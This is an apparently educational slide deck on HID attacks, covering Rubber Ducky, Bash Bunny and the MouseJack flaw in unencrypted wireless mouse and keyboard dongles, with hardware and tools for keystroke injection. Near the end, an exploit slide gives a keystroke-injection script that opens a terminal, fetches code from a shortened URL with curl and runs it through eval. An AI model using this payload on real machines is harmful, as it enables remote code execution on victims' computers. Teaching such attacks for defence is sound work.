HID Attack

Cesena Security Network and Application

Human Interface Device

A human interface device or HID is a type of computer device usually used by humans and takes input and gives output to humans.

 

The term "HID" most commonly refers to the USB-HID specification.
The term was coined by Mike Van Flandern of Microsoft when he proposed that the USB committee create a Human Input Device class working group.

HID Attack

Rubber Ducky

https://ducktoolkit.com/

Bash Bunny

https://ducktoolkit.com/

MouseJack

Vulnerabilities affecting non-Bluetooth wireless mice and keyboard discovered by Marc Newlin by Bastille Threat Research Team.

 

https://www.bastille.net/

https://www.mousejack.com/

 

This kind of vulnerabilities enable an attacker to type arbitrary commands into a victim's machine using an USB dongle.

Why

Wireless mice and keyboards cumminicate using a proprietary standard protocols operating in the 2.4GHz ISM band (Industrial, Scientific, Medical):

 

there is no standard to follow

 

Each vendor can implement his own security scheme.

Why

In order to prevent eavesdropping, most vendor encrypt the data being transmitted by the keyboard. The dongle has the encryption key used by the keyboard so is able to decrypt the data and send the payload to the computer.


Without knowing the encryption key, an attacker is unable to decrypt the data, so the are unable to see what is being typed.

but....

MouseJack

Some mice tested by the Bastille team do not implement this kind of encryption: this mean that there is no authentication mechanism and the dongle is unable to distinguish between packets transmitted by a mouse and those transmitted by an attacker researcher.

 

 

 

 

 

 

Not very usefull to just press a mouse button...

MouseJack

Researcher discovered that the dongles can also process specially crafted packets which generate keypresses instead of mouse movement/clicks.

MouseJack

- keystroke injection, spoofing a mouse

- keystroke injection, spoofing a keyboard

- forced pair
 

How

Researcher discovered that the dongles can also process specially crafted packets which generate keypresses instead of mouse movement/clicks.

The nRF24L dongles for 2.4GHz devices support multiple data rates, address length, packets formats and checksums in spite of SDR devices which resulted slower, less configurable and harder to observe all the transmitted packets: when a mouse transmits a packet to a dongle, the dongles replies with an ACK packet whithin 250 microseconds.

How

CrazyRadio PA by bitcraze is an opensource device with an amplified nRF24L-based USB dongle: equivalent to an amplified version of the common USB dongle for mice and keyboards.

- pseudo-promiscuous mode
- packet sniffing
- packet injection
- easy interface
 

30 € su Amazon......

Attack

Attack

Real Attack

- choose victim

- gather informations

- write expliot

- profit

Real Attack

- choose victim with a possibile unpatched/vulnerable device

Real Attack

- gather informations about OS, keybinding, instelled tools, etc

Real Attack

- write exploit

DELAY 1000
GUI-SHIFT ENTER
DELAY 800
STRING (x=$(\curl -sL http://bit.ly/2yOCGw8);eval $x)&;disown %1;exit
ENTER

- JackIt

https://github.com/insecurityofthings/jackit

Source

https://www.bastille.net/

https://github.com/BastilleResearch/mousejack

https://www.youtube.com/watch?v=3NL2lEomB_Y

https://www.bitcraze.io/crazyradio-pa/

https://github.com/BastilleResearch/nrf-research-firmware/issues

https://github.com/insecurityofthings/jackit

Made with Slides.com